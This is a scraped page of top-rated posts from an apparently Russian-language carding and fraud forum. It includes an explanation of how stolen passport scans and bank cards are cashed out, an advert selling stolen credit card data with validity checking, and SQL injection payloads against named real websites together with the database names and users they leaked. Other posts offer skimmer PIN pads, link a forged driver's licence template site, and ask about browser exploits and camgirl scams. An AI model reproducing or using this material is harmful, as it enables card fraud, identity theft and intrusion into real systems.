И это не реклама. За это дают хорошие сроки. Так чем же грозит вам потеря личных данных? Что могут сделать с помощью простого скана паспорта и карт? Да многое. Вот несколько способов получить профит со скана паспорта и карточек: Микрокредиты. Да, многие кредиторы требуют фотку паспорта в руках с лицом. Не проблема. За 100-200 рублей вам забабахают несколько нужных фоток. С одного сайта можно получить 50-100 баксов (было раньше так, суммы могут меняться). Отмывание денег. С карточки залили деньги в букмекерскую контору, покер-рум, поиграли, вывели на левый кошелёк (либо не левые, можно сделать кошель по данным, а с него в биткоины и всё). Способов много. 80% всех карт идёт на покупку в интернет магазинах. Заказал с левой карты айфончик на адрес, забрал посылочку и сидишь довольный. Но это только для профанов. На самом деле, там гемороя очень много, ведь магазины тоже усваивают урок. Авиа перелёты, депозиты в отелях, прокат авто, заказ еды. Да, это тоже можно сделать имея данные. Натыкался в даркнете на темы, где люди таким способом отдыхали на топовых курортах, по-соседству со звёздами и членами королевских семей. Если память не подводит, такая "поездка" обошлась в 1 лям американских денег. Чужих денег... Как же себя обезопасить? Могу дать лишь несколько советов: Покупайте только в проверенных интернет-магазинах, крупных магазинах. Проверяйте банкоматы на предмет лишних предметов (скиммеры). Не высылайте никому свои персональные данные, особенно сканы паспорта и других документов. Не ведитесь на скидки на авиаперелёты и депозиты в отелях, особенно в соц. сетях. Не посещайте подозрительные сайты и не скачивайте левое ПО (всякие читы, парсеры, и т.д. для заработка легких денег).
  12. 1 балл
    хорошая профессия кстати , людям помогает , которые дозу жаждут
  13. 1 балл
    Благодарю за сопровождение сделки Все чики-пуки
  14. 1 балл
  15. 1 балл
  16. 1 балл
    Масштабы достигли такого размера, что о нас, работяги, начал писать mail.ru и что самое интересное - они не могут понять для чего всё это делается.
  17. 1 балл
    Прикольно, только напряжно, хотя думаю по 5к в день можно иметь, только надо быть онлайн постоянно
  18. 1 балл
  19. 1 балл
  20. 1 балл
    Заказал два дня назад, жду вот своих карт сижу, как обналичу, напишу сразу отзыв
  21. 1 балл
    Схема достойная, своих денег точно стоит, окупаемость 3 дня, ничего сложного для себя я не нашел Спасибо)
  22. 1 балл
    Воспользовался , на свой страх и риск работал через гаранта Но все же работу ТС выполнил без каких либо проблем и задержек указанного срока, спасибос
  23. 1 балл
    Можно любить или не любить продукцию компании Apple, но все равно нужно признать тот факт, что «яблочные» гаджеты пользуются невероятной популярностью во всем мире. И такое положение дел, скорее всего, сохранится в ближайшие годы. Компания Apple за время своего существования создать целую армию фанатов своих продуктов. И эта армия неуклонно растет, принося сотни миллионов продаж и миллиарды прибыли. Но не только корпорация Apple зарабатывает хорошие деньги на выпуске различных электронных устройств. Многочисленные предприниматели по всему миру уже давно рассмотрели перспективы развития собственного бизнеса при помощи продукции «яблочников». Сегодня мы расскажем о том, как предприимчивые граждане зарабатывают на любви других к продуктам Apple вообще, и на ажиотаже, связанном с выходом нового IPhone. Изготовление аксессуаров для IPhone 8 Сегодня просто невозможно зайти в магазин (или интернет-магазин) электроники и не увидеть предложение самых разнообразных аксессуаров для IPhone, IPod, IPad. Среди покупателей успехом пользуются не только сами устройства, но и разнообразные дополнения к ним. Наиболее популярными являются всевозможные защитные пленки, наклейки для корпуса, чехлы. Изготовление этих аксессуаров не требует от производителя каких-то особенных знаний и умений. Нужно только знать размеры устройства, для которого изготавливается наклейка или чехол. Самое приятное в этом деле то, что начать зарабатывать на продаже аксессуаров можно еще до начала продаж устройства. Невероятный ажиотаж, который сопровождает выход любой новинки от Apple, играет на руку самым предприимчивым и быстрым бизнесменам. Они успевают организовать продажи в период, когда на рынке еще нет, или практически нет, конкурентов. Яркий пример – изготовление чехлов для IPhone 8. 18 сентября состоялась презентация нового телефона от Apple. Продажи IPhone 8 стартуют где то в ноябре. Магазины ждут поступление новинки на прилавки. Большая часть производителей аксессуаров ждут старт продаж IPhone 8. А самые предприимчивые бизнесмены уже зарабатывают на этом долгожданном событии. Например, даже сегодня – за неделю до официальной даты начала продаж – в большинстве интернет-магазинов невозможно найти чехол для Apple IPhone 8. Да что там говорить, практически нигде нет чехлов для восьмого Айфона. Хотя соответствующий раздел уже имеется во всех магазинах электроники. Это касается не только чехлов, но и других аксессуаров. Почему абсолютное большинство производителей до сих пор не воспользовались ситуацией остается загадкой. Ведь эти девять дней – между официальной премьерой и началом продаж – идеальный период для входа на рынок. Даже новичок имеет возможность организовать быстрые продажи и практически мгновенно получить существенную прибыль. Конкурентов практически нет, ажиотаж вокруг выхода IPhone 8 просто запредельный, размеры устройства известны. То есть все для того, чтобы взять быстрый и уверенный старт. Даже крупные компании и специалисты не обходят стороной подобные события. Например, лондонский дизайнер Лара Боинк разработала дизайн эксклюзивных чехлов для IPhone 8, а компания CalypsoCrystal из Словении изготовила эти аксессуары. Каждый из трех дизайнов отличается по цвету и материалам отделки. Стоимость новинки 190 долларов. Не так уж и много, учитывая то, что при изготовлении используется серебро, титан и дорогая итальянская кожа. Разработка приложений для IPhone 8 Выход нового устройства Apple – это отличная возможность быстрого заработка и для разработчиков приложений. Тем более тогда, когда новый гаджет оснащается новым экраном и более мощным процессором. Конкуренции еще нет, а спрос начнет неуклонно расти уже с завтрашнего дня. Так что – самое время задуматься над разработкой игр и полезных программ для IPhone 8. Даже если вы не являетесь программистом и дизайнером, вы всегда можете найти и нанять нужных специалистов. Лучше всего искать разработчиков на биржах фриланса. Здесь всегда можно найти опытных мастеров, готовых выполнить поставленную задачу в кратчайший срок и за минимальные деньги. От вас требуется только одно – уникальная идея нового приложения, которое будет пользоваться успехом среди пользователей App Store (магазин приложений для Apple). Чем быстрее вашу светлую голову посетит гениальная идея, тем меньше шансов, что вас опередят конкуренты. Ведь когда дело касается выхода на рынок новых устройств от Apple, действовать нужно оперативно. Еще один, довольно необычный, способ заработка на выходе IPhone 8 Нужно сказать, что данный вариант обогащения будет работать всегда, когда дело касается повышенного ажиотажа перед началом продаж чего-либо (и необязательно, чтобы продукты был «яблочным»). Начала продаж IPhone 8 ждут многочисленные фанаты по всему. Люди собирают все свои сбережения, чтобы приобрести очередной «яблочный» гаджет по предзаказу. Они готовы на все, чтобы оказаться в числе первых покупателей нового телефона. Но самое невообразимое творится у главного магазина Apple в Нью-Йорке. По словам очевидцев, люди начали покидать свои дома и выстраиваться в очередь…. За неделю до начала продаж IPhone 8. Они берут с собой спальные мешки, запасаются едой и водой, чтобы не потерять свое место в очереди. Но далеко не все преследуют цель – первыми приобрести новый гаджет. Многие занимают места в очереди с целью их последующей продажи настоящим фанатам Apple, которые готовы покупать места в очереди по 100, 500 и даже по 1000 долларов. Все эти примеры говорят о том, что бизнес на ажиотаже перед выходом очередной новинки является сверхприбыльным. Первыми покупателями управляют не логика и здравый смысл, а только лишь их эмоции. Именно они заставляют переплачивать огромные деньги, в надежде стать одним из первых покупателей устройства и аксессуаров к нему.
  24. 1 балл
  25. 1 балл
    На этом форуме продаются такие приколюхи , а вы учите как на них не вестись ?)
  26. 1 балл
    Пин пады пришли. все кто интересовался жду в лс.
  27. 1 балл
    Ответил , извеняюсь за задержку ответа. Пишите в телеграм, там оперативней отвечаю
  28. 1 балл
    Гарант, спасибо что ты есть.
  29. 1 балл
    Админ уже борится с ошибками!Маленько терпения!
  30. 1 балл
    Спасиибо) Аки вообще крутые) Да еще и с балансом!
  31. 1 балл
    Предлагаю СС разных стран для продажи В наличии имеются с основном основные страны европы и юса в больших количествах. Цены от 3$ При проверке валидности моим чекером + 0,3$ к стоимости. Если чек показал, что карта не валид, то чек бесплатный. При желании покупателя можем проверить карту на PayPal и VBV/MCSC(обращаться по контатам). Поиск и сортировка бесплатно. Возможен поиск по стране, штату, городу и Бинам. формат СС BIN EXP NAME AVS COUNTRY TYPE STATE CITY ZIP SSN DOB BASE
  32. 1 балл
    Статья 187 уголовного кодекса за гугли :geek:
  33. 1 балл
    Интересный сайт http://www.driverslicensepsd.com/
  34. 1 балл
    Я выступаю в роли гаранта,т.е схемы не я придумываю.Перед продажей мы все проверяем на работоспособность и выхлоп.Сомнений не должно у вас возникать если прочитаете правила.Если вы не получаете выхлоп то я верну вам деньги,а сам автор не получает денежку!
  35. 1 балл
  36. 1 балл
    Мдя... Никогда не думал, что тема про баню таким тесным образом может переплестись с астрологией. Мож посоветовать моему товарищу открыть астрологическую баню, или на худой конец планетарий?
  37. 1 балл
    Ок! но с дикими зверями думающими и принимающими свои решения агрессивно жестко по американски с твердолобым мышлением ковбоя за баблом иначе никак ни-з-зя-я! съедят! однако )))) а вот с теми, кто умеет шевелить своми мозгами и старается взять в конкретном месте столько, чтобы и сил хватило унести и успех был в итоге, я крайне предупредителен и вежлив и терпелив, но я вовсе не обязан быть для всех воспитателем детсткого садика ))) наоборот, считаю себя, по своим способностям и опыту фронтовым хирургом... который по долгу службы общается с тяжело раненными, и тут не до веждивых приседаний с вареньем в ложечке и ленивых танцев на паркете, времени нет на сладенькие улыбки и чмоки...с точками и запятыми... ну а если потом у клиента, даже, после и болезненной оперции и реанимации его возможностей и мышления, будет упрямое желание таки себя обанкротить своими глупыми решениями, ну так это уже к психиатру пл-и-из! вот он и будет для упетрых и самовлюбленных пациентов американского разлива самым вежливым и терпеливым! теперь понятно?
  38. 1 балл
    Что такое за форум просветите
  39. 1 балл
    Валяется уже пол года, использовался 2 раза состояние нового В комплекте 500 золотых болванок Отправка любым удобным способом отдам все за 10000р
  40. 1 балл
    Drop777, ну насколько я знаю они пишутся на javascript-е (исправте если нет). Конечная цель - просто узнать что это и если попрет, то писать и работать с кем-то =)) почитал статью и хочу уточнить - хочу подробно узнать об эксплойтах для браузеров
  41. 1 балл
    Выкладываем в этой теме найденые SQL иньекции. Раскручиваем скулю до версии мускуля бд и юзера. Можно сразу на вывод определенной инфы. Пример: http://www.anonym.to/?http://www.interp ... t(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- Version:5.0.77 Database:interplay user:interplay@localhost Иньекции такого вида не нужны будут удаляться. http://site.com/news.php?id=4' ........................................................................................................................................ http://bpsca.co.uk/products.php?id=132- ... t(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12-- Version:5.1.56-community-log Database:web231-website-1 User:web231-website-1@79.170.40.231 ........................................................................................................................................ http://newportrestaurantgroup.com/press ... t(version(),0x3a,database(),0x3a,user()),5,6,7-- Version:5.0.51a Database:newporth_NHCSync User:newporth_blackst@81-185-38-208.tpa.kgix.net ........................................................................................................................................ http://newagestudios.co.uk/serviceinfo. ... t(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- Version:5.0.45-community-nt Database:newagestudios User:newagestudios@localhost ........................................................................................................................................ http://naturalpaving.co.uk/page.php?id= ... ,(version(),0x3a,database(),0x3a,user()),4,5,6,7,8-- Version:5.0.77-log Database:naturalpdb User:npvadmin@server213-171-218-185.livedns.org.uk Ковыряйте глядиш че нужного вам найдете
  42. 1 балл
  43. 1 балл
    привет вот решил посливать на моделей в видео чатах завербовал пару телок но опыта в этом 0 1. список кантор где лучше всего зарегаца моделям с удобным для них методом выплат модели из раши 2. ну и немного раскажите о сливе чтоб ненакосячить
  44. 1 балл
    общался с человеком, он продает эти устройства, перепрошивать нужно 100%, так как на стандартной прошивке половина инфы будет скрыто звездочками. Прошивку можно расковырять в настройках безопасности все можно снять, но это не так просто.
  45. 1 балл
    Ничего тебе не будет без весомых доказательств.
  46. 1 балл
    Согласен, одумайтесь. Никто не хочет играть в рулетку выходя из дома, в неадеквате никто не знает как покажзет себя организм, сегодня с тобой все нормально, а завтра годы или прочее возьмет свое. Не думаешь о себе, подумай о других, о детях которые ходят по улицам. Когда то они будут и у тебя, если сейчас нету. Не этим стоит выделываться.
  47. 1 балл
    правила раздела читали? цену выложите
  48. 1 балл
    Сейчас уже походу везде обновления поставили.!!
  49. 1 балл
    Очень радует, что появились инициативные персонажи на форуме. Verty, Если докажешь свою компетентность в своей области - готов буду рассмотреть твою кандидатуру на роль модератора в разделе "мошенничество"
  50. 1 балл
    со своей стороны могу предложить помощь в инфе не из паблик баз...неужели не кто не сталкивался?
×
×
  • Создать...